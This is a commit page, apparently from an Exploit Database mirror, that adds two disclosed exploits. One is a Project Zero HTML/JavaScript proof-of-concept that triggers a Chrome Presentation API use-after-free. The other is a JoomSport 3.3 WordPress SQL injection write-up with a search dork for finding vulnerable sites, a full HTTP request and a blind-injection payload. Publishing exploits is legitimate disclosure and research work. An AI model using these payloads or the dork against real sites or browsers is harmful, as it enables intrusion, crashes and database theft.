DB: 2019-08-08
2 changes to exploits/shellcodes Google Chrome 74.0.3729.0 / 76.0.3789.0 - Heap Use-After-Free in blink::PresentationAvailabilityState::UpdateAvailability WordPress Plugin JoomSport 3.3 - SQL Injection
This commit is contained in:
parent
fe9103a0fb
commit
44a9c2cd04
3 changed files with 95 additions and 0 deletions
47
exploits/multiple/dos/47211.html
Normal file
47
exploits/multiple/dos/47211.html
Normal file
|
@ -0,0 +1,47 @@
|
|||
<!--
|
||||
VULNERABILITY DETAILS
|
||||
void PresentationAvailabilityState::UpdateAvailability(
|
||||
const KURL& url,
|
||||
mojom::blink::ScreenAvailability availability) {
|
||||
[...]
|
||||
{
|
||||
// Set |iterating_listeners_| so we know not to allow modifications
|
||||
// to |availability_listeners_|.
|
||||
base::AutoReset<bool> iterating(&iterating_listeners_, true);
|
||||
for (auto& listener_ref : availability_listeners_) {
|
||||
auto* listener = listener_ref.get();
|
||||
if (!listener->urls.Contains<KURL>(url))
|
||||
continue;
|
||||
|
||||
auto screen_availability = GetScreenAvailability(listener->urls);
|
||||
DCHECK(screen_availability != mojom::blink::ScreenAvailability::UNKNOWN);
|
||||
for (auto* observer : listener->availability_observers)
|
||||
observer->AvailabilityChanged(screen_availability); // ***1***
|
||||
[...]
|
||||
|
||||
`PresentationAvailabilityObserver::AvailabilityChanged` might call a user-defined JS event handler,
|
||||
which in turn might modify `availability_observers` and invalidate the `for` loop's iterator.
|
||||
|
||||
VERSION
|
||||
Chromium 74.0.3729.0 (Developer Build) (64-bit)
|
||||
Chromium 76.0.3789.0 (Developer Build) (64-bit)
|
||||
|
||||
REPRODUCTION CASE
|
||||
Note that you need an extra display connected to your machine to reproduce the bug, otherwise
|
||||
`UpdateAvailability` won't be called.
|
||||
-->
|
||||
|
||||
<body>
|
||||
<script>
|
||||
frame = document.body.appendChild(document.createElement("iframe"));
|
||||
request = new frame.contentWindow.PresentationRequest([location]);
|
||||
request.getAvailability().then(availability => {
|
||||
availability.onchange = () => frame.remove();
|
||||
});
|
||||
</script>
|
||||
</body>
|
||||
|
||||
<!--
|
||||
CREDIT INFORMATION
|
||||
Sergei Glazunov of Google Project Zero.
|
||||
-->
|
46
exploits/php/webapps/47210.txt
Normal file
46
exploits/php/webapps/47210.txt
Normal file
|
@ -0,0 +1,46 @@
|
|||
# Exploit Title: JoomSport 3.3 – for Sports - SQL injection
|
||||
# Google Dork: intext:powered by JoomSport - sport WordPress plugin
|
||||
# Date:29/07/2019.
|
||||
# Exploit Author: Pablo Santiago
|
||||
# Vendor Homepage: https://beardev.com/
|
||||
# Software Link: https://wordpress.org/plugins/joomsport-sports-league-results-management/
|
||||
# Version: 3.3
|
||||
# Tested on: Windows and Kali linux
|
||||
# CVE :2019-14348
|
||||
# References: https://hackpuntes.com/cve-2019-14348-joomsport-for-sports-sql-injection/
|
||||
|
||||
# 1. Technical Description:
|
||||
#Through the SQL injection vulnerability, a malicious user could
|
||||
inject SQL code in order to steal information from the database,
|
||||
modify data from the database, even delete database or data from
|
||||
them.
|
||||
|
||||
#2. Request: All requests that contains the parameter sid are
|
||||
vulnerables to SQL injection
|
||||
|
||||
POST /wordpress/joomsport_season/new-yorkers/?action=playerlist HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0)
|
||||
Gecko/20100101 Firefox/67.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://localhost/wordpress/joomsport_season/new-yorkers/?action=playerlist
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 22
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Cookie: PHPSESSID=s010flbg7fbohnguabsvjaut40
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
sid=1&page=1&jscurtab=
|
||||
|
||||
# 3. Payload:
|
||||
|
||||
Parameter: sid (POST)
|
||||
Type: boolean-based blind
|
||||
Title: Or boolean-based blind - WHERE or HAVING clause
|
||||
Payload: sid=-3506 OR 7339=7339&page=1jscurtab=
|
||||
|
||||
# 4. Reference:
|
||||
# https://hackpuntes.com/cve-2019-14348-joomsport-for-sports-sql-injection/
|
|
@ -6521,6 +6521,7 @@ id,file,description,date,author,type,platform,port
|
|||
47193,exploits/multiple/dos/47193.txt,"iMessage - Memory Corruption when Decoding NSKnownKeysDictionary1",2019-07-30,"Google Security Research",dos,multiple,
|
||||
47194,exploits/multiple/dos/47194.txt,"iMessage - NSKeyedUnarchiver Deserialization Allows file Backed NSData Objects",2019-07-30,"Google Security Research",dos,multiple,
|
||||
47207,exploits/macos/dos/47207.txt,"macOS iMessage - Heap Overflow when Deserializing",2019-08-05,"Google Security Research",dos,macos,
|
||||
47211,exploits/multiple/dos/47211.html,"Google Chrome 74.0.3729.0 / 76.0.3789.0 - Heap Use-After-Free in blink::PresentationAvailabilityState::UpdateAvailability",2019-08-07,"Google Security Research",dos,multiple,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -41577,3 +41578,4 @@ id,file,description,date,author,type,platform,port
|
|||
47204,exploits/php/webapps/47204.txt,"Sar2HTML 3.2.1 - Remote Command Execution",2019-08-02,"Cemal Cihad ÇİFTÇİ",webapps,php,80
|
||||
47205,exploits/php/webapps/47205.txt,"Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection",2019-08-02,n1x_,webapps,php,80
|
||||
47206,exploits/php/webapps/47206.txt,"1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting",2019-08-02,"Kusol Watchara-Apanukorn",webapps,php,80
|
||||
47210,exploits/php/webapps/47210.txt,"WordPress Plugin JoomSport 3.3 - SQL Injection",2019-08-07,"Pablo Santiago",webapps,php,80
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue